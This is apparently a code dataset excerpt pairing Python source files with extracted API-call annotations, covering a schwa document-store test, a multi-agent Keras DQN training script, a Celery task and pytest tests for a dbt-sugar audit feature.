"(f'{local_dir}/feature_data.csv')\n", (4431, 4464), True, 'import pandas as pd\n'), ((5569, 5603), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '(num_features,)'}), '(shape=(num_features,))\n', (5580, 5603), False, 'from tensorflow import keras, one_hot\n'), ((6077, 6120), 'tensorflow.keras.Model', 'keras.Model', ([], {'inputs': 'inputs', 'outputs': 'outputs'}), '(inputs=inputs, outputs=outputs)\n', (6088, 6120), False, 'from tensorflow import keras, one_hot\n'), ((1580, 1610), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (1592, 1610), False, 'import requests\n'), ((5514, 5530), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (5522, 5530), True, 'import numpy as np\n'), ((6004, 6050), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['num_labels'], {'activation': '"""softmax"""'}), "(num_labels, activation='softmax')\n", (6016, 6050), False, 'from tensorflow.keras import layers\n'), ((6674, 6707), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {'n_jobs': '(-1)'}), '(n_jobs=-1)\n', (6696, 6707), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((6204, 6229), 'tensorflow.keras.optimizers.Adamax', 'keras.optimizers.Adamax', ([], {}), '()\n', (6227, 6229), False, 'from tensorflow import keras, one_hot\n'), ((6261, 6299), 'tensorflow.keras.losses.CategoricalCrossentropy', 'keras.losses.CategoricalCrossentropy', ([], {}), '()\n', (6297, 6299), False, 'from tensorflow import keras, one_hot\n'), ((7045, 7091), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {'n_neighbors': '(5)', 'n_jobs': '(-1)'}), '(n_neighbors=5, n_jobs=-1)\n', (7065, 7091), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((5652, 5658), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5656, 5658), False, 'from tensorflow.keras.layers import ReLU\n'), ((5716, 5722), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5720, 5722), False, 
'from tensorflow.keras.layers import ReLU\n'), ((5780, 5786), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5784, 5786), False, 'from tensorflow.keras.layers import ReLU\n'), ((5844, 5850), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5848, 5850), False, 'from tensorflow.keras.layers import ReLU\n'), ((5907, 5913), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5911, 5913), False, 'from tensorflow.keras.layers import ReLU\n'), ((5969, 5975), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5973, 5975), False, 'from tensorflow.keras.layers import ReLU\n'), ((6351, 6375), 'tensorflow.keras.metrics.Accuracy', 'keras.metrics.Accuracy', ([], {}), '()\n', (6373, 6375), False, 'from tensorflow import keras, one_hot\n'), ((6575, 6601), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (['"""./results.csv"""'], {}), "('./results.csv')\n", (6584, 6601), False, 'from tensorflow.keras.callbacks import CSVLogger\n')] |
# vim: set et nosi ai ts=2 sts=2 sw=2:
# coding: utf-8
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from schwa import dr
class Node(dr.Ann):
label = dr.Field()
class Doc(dr.Doc):
store = dr.Store(Node)
class Test(unittest.TestCase):
def _test_example(self, doc):
doc.store = None
def test_example(self):
R = 'Cannot overwrite a store (.*)'
d = Doc()
d.store.create()
self.assertRaisesRegexp(ValueError, R, lambda: self._test_example(d))
| [
"schwa.dr.Store",
"schwa.dr.Field"
] | [((198, 208), 'schwa.dr.Field', 'dr.Field', ([], {}), '()\n', (206, 208), False, 'from schwa import dr\n'), ((240, 254), 'schwa.dr.Store', 'dr.Store', (['Node'], {}), '(Node)\n', (248, 254), False, 'from schwa import dr\n')] |
#!/usr/bin/env python
import os,sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import argparse
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
from PIL import Image
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(description=None)
parser.add_argument('-s', '--scenario', default='simple.py', help='Path of the scenario Python script.')
args = parser.parse_args()
# load scenario from script
scenario = scenarios.load(args.scenario).Scenario()
# create world
world = scenario.make_world()
# create multiagent environment
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, info_callback=None, shared_viewer = False)
# render call to create viewer window (necessary only for interactive policies)
env.render()
# execution loop
obs_n = env.reset()
DISCOUNT = 0.99
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 64 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '2x256'
MIN_REWARD = 20 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 200
# Exploration settings
epsilon = 1 # not a constant, going to be decayed
EPSILON_DECAY = 0.99975
MIN_EPSILON = 0.001
# Stats settings
AGGREGATE_STATS_EVERY = 50 # episodes
SHOW_PREVIEW = False
# For stats
ep_rewards = [[-200],[-200],[-200]]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self,i):
self.index=i
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}-{}".format(MODEL_NAME, self.index,int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=(10, 10, 3))) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(64))
model.add(Dense(5, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = np.array([transition[0] for transition in minibatch])/255
current_qs_list = self.model.predict(current_states)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = np.array([transition[3] for transition in minibatch])/255
future_qs_list = self.target_model.predict(new_current_states)
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
d = {1: (100, 0, 0),
2: (0, 100, 0),
3: (0, 0, 100),
4: (25,25,25)}
def getobs(obsn):
env = np.zeros((10, 10, 3), dtype=np.uint8) # starts an rbg of our size
obs=obsn.copy()
for i in obs:
i=int((i+1)/0.2)
env[int(obs[0])][int(obs[1])][0]+=100 # sets the food location tile to green color
env[int(obs[2])][int(obs[3])][1]+=100
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
img=np.array(img)
return img
def getobsi(obsn):
env = np.zeros((10, 10, 3), dtype=np.uint8) # starts an rbg of our size
obs=obsn.copy()
for i in obs:
i=int((i+1)/0.2)
env[int(obs[2])][int(obs[3])][0]+=100 # sets the food location tile to green color
env[int(obs[4])][int(obs[5])][1]+=100 # sets the enemy location to red
env[int(obs[6])][int(obs[7])][2] +=100 # sets the player tile to blue
env[int(obs[8])][int(obs[9])][0] +=25
env[int(obs[8])][int(obs[9])][1] +=25
env[int(obs[8])][int(obs[9])][2] +=25
env[int(obs[10])][int(obs[11])][0] +=25
env[int(obs[10])][int(obs[11])][1] +=25
env[int(obs[10])][int(obs[11])][2] +=25
env[int(obs[12])][int(obs[13])][0] +=25
env[int(obs[12])][int(obs[13])][1] +=25
env[int(obs[12])][int(obs[13])][2] +=25
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
img=np.array(img)
return img
# create interactive policies for each agent
policies = [DQNAgent(i) for i in range(env.n)]
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
episode_reward=[0,0,0]
step=1
for i, policy in enumerate(policies):
policy.tensorboard.step=episode
# query for action from each agent's policy
obs_n=env.reset()
done = False
while not done:
act_n = []
action_n=[]
for i, policy in enumerate(policies):
act = np.zeros(5)
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(policy.get_qs(getobs(obs_n[i])))
else:
# Get random action
action = np.random.randint(0, 5)
act[action]+=1.0
action_n.append(action)
act_n.append(act)
# step environment
newobs_n, reward_n, done_n, _ = env.step(act_n)
if step>=100:
done=True
for i, policy in enumerate(policies):
episode_reward[i]+=reward_n[i]
policy.update_replay_memory((getobs(obs_n[i]), action_n[i], reward_n[i], getobs(newobs_n[i]), done))
policy.train(done, step)
obs_n=newobs_n
step+=1
#if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
if episode % 50==1:
env.render()
for i, policy in enumerate(policies):
ep_rewards[i].append(episode_reward[i])
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[i][-AGGREGATE_STATS_EVERY:])/len(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
policy.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if min_reward >= MIN_REWARD:
policy.model.save(f'models/{MODEL_NAME+str(policy.index)}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
| [
"keras.layers.Conv2D",
"numpy.array",
"keras.layers.Activation",
"keras.layers.Dense",
"tensorflow.set_random_seed",
"multiagent.environment.MultiAgentEnv",
"collections.deque",
"argparse.ArgumentParser",
"numpy.random.random",
"numpy.max",
"os.path.isdir",
"numpy.random.seed",
"keras.optimi... | [((55, 86), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""'], {}), "(sys.path[0], '..')\n", (67, 86), False, 'import os, sys\n'), ((647, 688), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'None'}), '(description=None)\n', (670, 688), False, 'import argparse\n'), ((1017, 1144), 'multiagent.environment.MultiAgentEnv', 'MultiAgentEnv', (['world', 'scenario.reset_world', 'scenario.reward', 'scenario.observation'], {'info_callback': 'None', 'shared_viewer': '(False)'}), '(world, scenario.reset_world, scenario.reward, scenario.\n observation, info_callback=None, shared_viewer=False)\n', (1030, 1144), False, 'from multiagent.environment import MultiAgentEnv\n'), ((2117, 2131), 'random.seed', 'random.seed', (['(1)'], {}), '(1)\n', (2128, 2131), False, 'import random\n'), ((2136, 2153), 'numpy.random.seed', 'np.random.seed', (['(1)'], {}), '(1)\n', (2150, 2153), True, 'import numpy as np\n'), ((2158, 2179), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['(1)'], {}), '(1)\n', (2176, 2179), True, 'import tensorflow as tf\n'), ((2461, 2484), 'os.path.isdir', 'os.path.isdir', (['"""models"""'], {}), "('models')\n", (2474, 2484), False, 'import os, sys\n'), ((2494, 2515), 'os.makedirs', 'os.makedirs', (['"""models"""'], {}), "('models')\n", (2505, 2515), False, 'import os, sys\n'), ((8475, 8512), 'numpy.zeros', 'np.zeros', (['(10, 10, 3)'], {'dtype': 'np.uint8'}), '((10, 10, 3), dtype=np.uint8)\n', (8483, 8512), True, 'import numpy as np\n'), ((8770, 8797), 'PIL.Image.fromarray', 'Image.fromarray', (['env', '"""RGB"""'], {}), "(env, 'RGB')\n", (8785, 8797), False, 'from PIL import Image\n'), ((8881, 8894), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (8889, 8894), True, 'import numpy as np\n'), ((8959, 8996), 'numpy.zeros', 'np.zeros', (['(10, 10, 3)'], {'dtype': 'np.uint8'}), '((10, 10, 3), dtype=np.uint8)\n', (8967, 8996), True, 'import numpy as np\n'), ((9810, 9837), 'PIL.Image.fromarray', 
'Image.fromarray', (['env', '"""RGB"""'], {}), "(env, 'RGB')\n", (9825, 9837), False, 'from PIL import Image\n'), ((9921, 9934), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9929, 9934), True, 'import numpy as np\n'), ((877, 906), 'multiagent.scenarios.load', 'scenarios.load', (['args.scenario'], {}), '(args.scenario)\n', (891, 906), True, 'import multiagent.scenarios as scenarios\n'), ((2833, 2868), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['self.log_dir'], {}), '(self.log_dir)\n', (2854, 2868), True, 'import tensorflow as tf\n'), ((4104, 4136), 'collections.deque', 'deque', ([], {'maxlen': 'REPLAY_MEMORY_SIZE'}), '(maxlen=REPLAY_MEMORY_SIZE)\n', (4109, 4136), False, 'from collections import deque\n'), ((4497, 4509), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (4507, 4509), False, 'from keras.models import Sequential\n'), ((5911, 5960), 'random.sample', 'random.sample', (['self.replay_memory', 'MINIBATCH_SIZE'], {}), '(self.replay_memory, MINIBATCH_SIZE)\n', (5924, 5960), False, 'import random\n'), ((4532, 4576), 'keras.layers.Conv2D', 'Conv2D', (['(256)', '(3, 3)'], {'input_shape': '(10, 10, 3)'}), '(256, (3, 3), input_shape=(10, 10, 3))\n', (4538, 4576), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4661, 4679), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (4671, 4679), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4703, 4733), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (4715, 4733), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4757, 4769), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (4764, 4769), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4798, 4817), 'keras.layers.Conv2D', 'Conv2D', (['(256)', '(3, 3)'], 
{}), '(256, (3, 3))\n', (4804, 4817), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4841, 4859), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (4851, 4859), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4883, 4913), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (4895, 4913), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4937, 4949), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (4944, 4949), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4978, 4987), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (4985, 4987), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((5070, 5079), 'keras.layers.Dense', 'Dense', (['(64)'], {}), '(64)\n', (5075, 5079), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((5108, 5137), 'keras.layers.Dense', 'Dense', (['(5)'], {'activation': '"""linear"""'}), "(5, activation='linear')\n", (5113, 5137), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((6077, 6130), 'numpy.array', 'np.array', (['[transition[0] for transition in minibatch]'], {}), '([transition[0] for transition in minibatch])\n', (6085, 6130), True, 'import numpy as np\n'), ((6411, 6464), 'numpy.array', 'np.array', (['[transition[3] for transition in minibatch]'], {}), '([transition[3] for transition in minibatch])\n', (6419, 6464), True, 'import numpy as np\n'), ((7549, 7560), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (7557, 7560), True, 'import numpy as np\n'), ((10578, 10589), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (10586, 10589), True, 'import numpy as np\n'), ((5231, 5245), 'keras.optimizers.Adam', 'Adam', 
([], {'lr': '(0.001)'}), '(lr=0.001)\n', (5235, 5245), False, 'from keras.optimizers import Adam\n'), ((6997, 7026), 'numpy.max', 'np.max', (['future_qs_list[index]'], {}), '(future_qs_list[index])\n', (7003, 7026), True, 'import numpy as np\n'), ((7532, 7543), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (7540, 7543), True, 'import numpy as np\n'), ((10609, 10627), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (10625, 10627), True, 'import numpy as np\n'), ((10848, 10871), 'numpy.random.randint', 'np.random.randint', (['(0)', '(5)'], {}), '(0, 5)\n', (10865, 10871), True, 'import numpy as np\n'), ((4291, 4302), 'time.time', 'time.time', ([], {}), '()\n', (4300, 4302), False, 'import time\n'), ((8271, 8286), 'numpy.array', 'np.array', (['state'], {}), '(state)\n', (8279, 8286), True, 'import numpy as np\n'), ((12482, 12493), 'time.time', 'time.time', ([], {}), '()\n', (12491, 12493), False, 'import time\n')] |
#! python3
# -*- encoding: utf-8 -*-
from job import celery
@celery.task()
def add(x, y):
return x+y
| [
"job.celery.task"
] | [((65, 78), 'job.celery.task', 'celery.task', ([], {}), '()\n', (76, 78), False, 'from job import celery\n')] |
from pathlib import Path
from unittest.mock import call
import pytest
from dbt_sugar.core.clients.dbt import DbtProfile
from dbt_sugar.core.config.config import DbtSugarConfig
from dbt_sugar.core.flags import FlagParser
from dbt_sugar.core.main import parser
from dbt_sugar.core.task.audit import AuditTask
from dbt_sugar.core.task.base import COLUMN_NOT_DOCUMENTED
FIXTURE_DIR = Path(__file__).resolve().parent
def __init_descriptions(datafiles):
flag_parser = FlagParser(parser)
config_filepath = Path(FIXTURE_DIR).joinpath("sugar_config.yml")
flag_parser.consume_cli_arguments(
test_cli_args=[
"audit",
"--config-path",
str(config_filepath),
]
)
sugar_config = DbtSugarConfig(flag_parser)
sugar_config.load_config()
profile = DbtProfile(
flags=flag_parser,
profile_name="dbt_sugar_test",
target_name=str(),
profiles_dir=Path(datafiles),
)
profile.read_profile()
audit_task = AuditTask(flag_parser, FIXTURE_DIR, sugar_config=sugar_config, dbt_profile=profile)
audit_task.dbt_definitions = {"columnA": "descriptionA", "columnB": "descriptionB"}
audit_task.repository_path = Path("tests/test_dbt_project/")
return audit_task
@pytest.mark.parametrize(
"dbt_definitions, result",
[
pytest.param(
{"columnA": "descriptionA", "columnB": "descriptionB"},
"100.0",
id="all_columns_documented",
),
pytest.param(
{"columnA": COLUMN_NOT_DOCUMENTED, "columnB": COLUMN_NOT_DOCUMENTED},
"0.0",
id="none_columns_documented",
),
pytest.param(
{"columnA": "descriptionA", "columnB": COLUMN_NOT_DOCUMENTED},
"50.0",
id="half_columns_documented",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_project_total_test_coverage(datafiles, dbt_definitions, result):
audit_task = __init_descriptions(datafiles)
audit_task.dbt_definitions = dbt_definitions
assert audit_task.get_project_total_test_coverage() == result
@pytest.mark.parametrize(
"failures, total, result",
[
pytest.param(
0,
0,
"0.0",
id="calculate_failures_with_0_failures_and_total",
),
pytest.param(
8,
10,
"20.0",
id="calculate_failures",
),
pytest.param(
0,
10,
"100.0",
id="calculate_failures_with_0_failures",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_calculate_coverage_percentage(datafiles, failures, total, result):
audit_task = __init_descriptions(datafiles)
assert audit_task.calculate_coverage_percentage(misses=failures, total=total) == result
@pytest.mark.parametrize(
"data, total, result",
[
pytest.param(
[],
"0.0",
{},
id="check_results_with_data_being_empty",
),
pytest.param(
["column_A"],
"10.0",
{"column_A": "", "": "", "Total": "10.0"},
id="check_results_with_one_data_element",
),
pytest.param(
["column_A", "column_B"],
"10.0",
{"column_A": "", "column_B": "", "": "", "Total": "10.0"},
id="check_results_with_more_than_one_data_element",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_print_nicely_the_data(datafiles, data, total, result):
audit_task = __init_descriptions(datafiles)
assert audit_task.print_nicely_the_data(data=data, total=total) == result
@pytest.mark.parametrize(
"dbt_tests, model_name, call_input",
[
pytest.param(
{
"dim_company": [
{"name": "id", "tests": []},
{"name": "name", "tests": []},
{"name": "age", "tests": []},
{"name": "address", "tests": ["not_null"]},
{"name": "salary", "tests": ["unique"]},
],
"stg_customers": [{"name": "customer_id", "tests": ["unique", "not_null"]}],
},
"dim_company",
[
call(
columns=["Untested Columns", "% coverage"],
data={"age": "", "id": "", "name": "", "": "", "Total": "40.0"},
title="Test Coverage",
)
],
id="check_test_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_model_test_coverage(datafiles, mocker, dbt_tests, model_name, call_input):
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.model_name = model_name
audit_task.dbt_tests = dbt_tests
audit_task.get_model_test_coverage()
create_table.assert_has_calls(call_input)
@pytest.mark.parametrize(
"dbt_tests, call_input",
[
pytest.param(
{
"dim_company": [
{"name": "id", "tests": []},
{"name": "name", "tests": []},
{"name": "age", "tests": []},
{"name": "address", "tests": ["not_null"]},
{"name": "salary", "tests": ["unique"]},
],
"stg_customers": [{"name": "customer_id", "tests": ["unique", "not_null"]}],
},
[
call(
columns=["Model Name", "% coverage"],
data={"dim_company": "40.0", "stg_customers": "100.0", "": "", "Total": "50.0"},
title="Test Coverage",
)
],
id="check_test_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_project_test_coverage(datafiles, mocker, dbt_tests, call_input):
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.dbt_tests = dbt_tests
audit_task.get_project_test_coverage()
create_table.assert_has_calls(call_input)
@pytest.mark.parametrize(
"model_content, model_name, call_input",
[
pytest.param(
{
"version": 2,
"models": [
{
"name": "dim_company",
"description": "aa.",
"columns": [
{"name": "id", "description": "No description for this column."},
{"name": "name", "description": "No description for this column."},
{"name": "age", "description": "No description for this column."},
{
"name": "address",
"description": "No description for this column.",
"tests": ["not_null"],
},
{"name": "salary", "description": "hey.", "tests": ["unique"]},
],
}
],
},
"dim_company",
[
call(
columns=["Undocumented Columns", "% coverage"],
data={"id": "", "name": "", "age": "", "address": "", "": "", "Total": "20.0"},
title="Documentation Coverage",
)
],
id="check_column_description_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_model_column_description_coverage(
datafiles, mocker, model_content, model_name, call_input
):
audit_task = __init_descriptions(datafiles)
audit_task.get_model_column_description_coverage()
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.model_content = model_content
audit_task.model_name = model_name
audit_task.get_model_column_description_coverage()
create_table.assert_has_calls(call_input)
| [
"dbt_sugar.core.task.audit.AuditTask",
"pathlib.Path",
"unittest.mock.call",
"pytest.mark.datafiles",
"pytest.param",
"dbt_sugar.core.flags.FlagParser",
"dbt_sugar.core.config.config.DbtSugarConfig"
] | [((1852, 1886), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (1873, 1886), False, 'import pytest\n'), ((2607, 2641), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (2628, 2641), False, 'import pytest\n'), ((3481, 3515), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (3502, 3515), False, 'import pytest\n'), ((4611, 4645), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (4632, 4645), False, 'import pytest\n'), ((5906, 5940), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (5927, 5940), False, 'import pytest\n'), ((7713, 7747), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (7734, 7747), False, 'import pytest\n'), ((471, 489), 'dbt_sugar.core.flags.FlagParser', 'FlagParser', (['parser'], {}), '(parser)\n', (481, 489), False, 'from dbt_sugar.core.flags import FlagParser\n'), ((741, 768), 'dbt_sugar.core.config.config.DbtSugarConfig', 'DbtSugarConfig', (['flag_parser'], {}), '(flag_parser)\n', (755, 768), False, 'from dbt_sugar.core.config.config import DbtSugarConfig\n'), ((1009, 1097), 'dbt_sugar.core.task.audit.AuditTask', 'AuditTask', (['flag_parser', 'FIXTURE_DIR'], {'sugar_config': 'sugar_config', 'dbt_profile': 'profile'}), '(flag_parser, FIXTURE_DIR, sugar_config=sugar_config, dbt_profile=\n profile)\n', (1018, 1097), False, 'from dbt_sugar.core.task.audit import AuditTask\n'), ((1214, 1245), 'pathlib.Path', 'Path', (['"""tests/test_dbt_project/"""'], {}), "('tests/test_dbt_project/')\n", (1218, 1245), False, 'from pathlib import Path\n'), ((1341, 1451), 'pytest.param', 'pytest.param', (["{'columnA': 'descriptionA', 'columnB': 'descriptionB'}", '"""100.0"""'], {'id': '"""all_columns_documented"""'}), "({'columnA': 'descriptionA', 'columnB': 'descriptionB'},\n '100.0', 
id='all_columns_documented')\n", (1353, 1451), False, 'import pytest\n'), ((1504, 1627), 'pytest.param', 'pytest.param', (["{'columnA': COLUMN_NOT_DOCUMENTED, 'columnB': COLUMN_NOT_DOCUMENTED}", '"""0.0"""'], {'id': '"""none_columns_documented"""'}), "({'columnA': COLUMN_NOT_DOCUMENTED, 'columnB':\n COLUMN_NOT_DOCUMENTED}, '0.0', id='none_columns_documented')\n", (1516, 1627), False, 'import pytest\n'), ((1680, 1797), 'pytest.param', 'pytest.param', (["{'columnA': 'descriptionA', 'columnB': COLUMN_NOT_DOCUMENTED}", '"""50.0"""'], {'id': '"""half_columns_documented"""'}), "({'columnA': 'descriptionA', 'columnB': COLUMN_NOT_DOCUMENTED},\n '50.0', id='half_columns_documented')\n", (1692, 1797), False, 'import pytest\n'), ((2201, 2277), 'pytest.param', 'pytest.param', (['(0)', '(0)', '"""0.0"""'], {'id': '"""calculate_failures_with_0_failures_and_total"""'}), "(0, 0, '0.0', id='calculate_failures_with_0_failures_and_total')\n", (2213, 2277), False, 'import pytest\n'), ((2346, 2398), 'pytest.param', 'pytest.param', 